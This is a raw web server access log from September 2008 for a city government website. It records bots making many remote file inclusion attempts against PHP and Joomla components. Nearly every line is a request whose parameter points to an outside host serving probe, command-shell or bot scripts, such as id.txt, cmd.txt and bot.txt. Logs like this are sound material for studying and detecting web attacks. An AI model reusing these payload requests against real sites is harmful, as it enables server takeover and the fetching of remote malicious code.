64.22.89.194 - - [01/Sep/2008:08:46:51 -0700] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
64.22.89.194 - - [01/Sep/2008:08:46:51 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
64.22.89.194 - - [01/Sep/2008:08:46:51 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:08:47:10 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:08:47:10 -0700] "GET //skin/zero_vote/error.php?dir=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
82.197.82.217 - - [01/Sep/2008:08:48:28 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "cityofarkadelphia.com"
82.197.82.217 - - [01/Sep/2008:08:48:28 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:08:49:22 -0700] "GET /logs/access_080201.log/index.php?pg=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:08:49:22 -0700] "GET /index.php?pg=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:08:49:23 -0700] "GET /logs/index.php?pg=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:08:49:41 -0700] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://www.cafetkoetshuis.nl/forum/phpbb/idbaru.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:08:49:45 -0700] "GET //?path%5Bdocroot%5D=http://www.cafetkoetshuis.nl/forum/phpbb/idbaru.txt???? HTTP/1.1" 200 917 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:08:49:49 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.cafetkoetshuis.nl/forum/phpbb/idbaru.txt???? HTTP/1.1" 200 4089 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:08:54:16 -0700] "GET //?path%5Bdocroot%5D=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 917 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.169.169.235 - - [01/Sep/2008:08:54:40 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/cmdk.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "cityofarkadelphia.com"
81.169.169.235 - - [01/Sep/2008:08:54:40 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/cmdk.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:08:55:52 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.cafetkoetshuis.nl/forum/phpbb/idbaru.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:08:57:44 -0700] "GET /show.php?mid=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:08:57:44 -0700] "GET /logs/show.php?mid=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "cityofarkadelphia.com"
81.169.169.235 - - [01/Sep/2008:09:01:00 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/cmdk.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "cityofarkadelphia.com"
81.169.169.235 - - [01/Sep/2008:09:01:01 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/cmdk.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "cityofarkadelphia.com"
69.42.221.130 - - [01/Sep/2008:09:03:22 -0700] "GET /logs/access.log/errors.php?error=http://k4ht.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
69.42.221.130 - - [01/Sep/2008:09:03:27 -0700] "GET /logs/errors.php?error=http://k4ht.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:04:20 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:04:24 -0700] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:04:24 -0700] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:04:50 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:04:50 -0700] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:04:51 -0700] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:04:52 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:04:53 -0700] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:04:56 -0700] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:05:01 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:05:01 -0700] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:05:02 -0700] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
62.140.23.20 - - [01/Sep/2008:09:05:07 -0700] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "cityofarkadelphia.com"
62.140.23.20 - - [01/Sep/2008:09:05:07 -0700] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "cityofarkadelphia.com"
64.22.89.194 - - [01/Sep/2008:09:08:05 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
64.22.89.194 - - [01/Sep/2008:09:08:05 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
64.22.89.194 - - [01/Sep/2008:09:08:05 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
194.60.207.171 - - [01/Sep/2008:09:10:58 -0700] "GET /logs/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "cityofarkadelphia.com"
194.60.207.171 - - [01/Sep/2008:09:10:58 -0700] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:09:11:02 -0700] "GET ////?view=page&pagename=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:09:11:02 -0700] "GET /logs////?view=page&pagename=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 200 4091 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "cityofarkadelphia.com"
87.106.98.71 - - [01/Sep/2008:09:13:34 -0700] "GET /logs/access_080201.log/index1.php?s=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.106.98.71 - - [01/Sep/2008:09:13:34 -0700] "GET /index1.php?s=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.106.98.71 - - [01/Sep/2008:09:13:35 -0700] "GET /logs/index1.php?s=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.22.110.198 - - [01/Sep/2008:09:17:45 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineaviation.com/osticket/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.42.221.130 - - [01/Sep/2008:09:17:58 -0700] "GET /errors.php?error=http://k4ht.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
64.22.89.194 - - [01/Sep/2008:09:18:45 -0700] "GET /logs/access_080330.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
194.60.207.171 - - [01/Sep/2008:09:19:27 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "cityofarkadelphia.com"
194.60.207.171 - - [01/Sep/2008:09:19:27 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:09:20:53 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.67.10.98 - - [01/Sep/2008:09:20:55 -0700] "GET /logs/access.log/errors.php?error=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
202.67.10.98 - - [01/Sep/2008:09:20:55 -0700] "GET /errors.php?error=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
202.67.10.98 - - [01/Sep/2008:09:20:56 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:09:21:09 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:09:21:09 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:09:21:09 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:09:21:12 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://borneo.siteburg.com/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:09:21:12 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://borneo.siteburg.com/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:09:21:12 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://borneo.siteburg.com/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:09:21:55 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.133.96.246 - - [01/Sep/2008:09:22:01 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://blueridgehost.com/events//tools/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.133.96.246 - - [01/Sep/2008:09:22:02 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://blueridgehost.com/events//tools/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.133.96.246 - - [01/Sep/2008:09:22:02 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://blueridgehost.com/events//tools/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
200.14.46.18 - - [01/Sep/2008:09:22:13 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.14.46.18 - - [01/Sep/2008:09:22:18 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.14.46.18 - - [01/Sep/2008:09:22:21 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.133.96.246 - - [01/Sep/2008:09:23:28 -0700] "GET /logs/access_080701.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://blueridgehost.com/events//tools/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:09:23:43 -0700] "GET /logs/access_080329.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:09:23:48 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
194.60.207.171 - - [01/Sep/2008:09:24:32 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "cityofarkadelphia.com"
194.60.207.171 - - [01/Sep/2008:09:24:32 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:09:25:09 -0700] "GET /logs/access_080330.log/inc/cmses/aedatingCMS.php?dir[inc]=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:09:25:14 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:25:38 -0700] "GET /logs/errors.php?error=http://nawl.fateback.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:25:38 -0700] "GET /logs/access.log/errors.php?error=http://nawl.fateback.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:25:38 -0700] "GET /errors.php?error=http://nawl.fateback.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:26:10 -0700] "GET /errors.php?error=http://nawl.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:26:10 -0700] "GET /logs/access.log/errors.php?error=http://nawl.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:26:10 -0700] "GET /logs/errors.php?error=http://nawl.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:09:27:06 -0700] "GET /logs/access_080701.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:09:27:06 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:09:27:07 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:09:27:36 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
69.42.221.130 - - [01/Sep/2008:09:29:41 -0700] "GET /logs/access_080201.log/errors.php?error=http://k4ht.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
194.60.207.171 - - [01/Sep/2008:09:32:36 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "cityofarkadelphia.com"
194.60.207.171 - - [01/Sep/2008:09:32:36 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:09:32:37 -0700] "GET /logs/access_080330.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:09:32:37 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:09:32:37 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:09:32:56 -0700] "GET /logs/access_080330.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:09:32:56 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:09:32:56 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
62.193.232.16 - - [01/Sep/2008:09:33:05 -0700] "GET /logs/head.php?adresa=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "cityofarkadelphia.com"
62.193.232.16 - - [01/Sep/2008:09:33:06 -0700] "GET /head.php?adresa=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:09:35:27 -0700] "GET //skin/zero_vote/error.php?dir=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:09:35:51 -0700] "GET /logs/access_080329.log/inc/cmses/aedatingCMS.php?dir[inc]=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:09:36:17 -0700] "GET /logs/access_080330.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:09:36:17 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:09:36:17 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:37:40 -0700] "GET /logs/access_080201.log/errors.php?error=http://nawl.fateback.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:09:37:50 -0700] "GET /logs/access_080330.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.207.167.157 - - [01/Sep/2008:09:38:14 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/scanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
200.207.167.157 - - [01/Sep/2008:09:38:15 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/scanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:09:38:54 -0700] "GET /logs/access_080201.log/errors.php?error=http://nawl.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.22.110.198 - - [01/Sep/2008:09:39:12 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://sunshineaviation.com/osticket/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
64.22.110.198 - - [01/Sep/2008:09:39:13 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://sunshineaviation.com/osticket/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
64.22.110.198 - - [01/Sep/2008:09:39:13 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://sunshineaviation.com/osticket/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
89.108.67.208 - - [01/Sep/2008:09:39:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineaviation.com/osticket/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:09:40:59 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
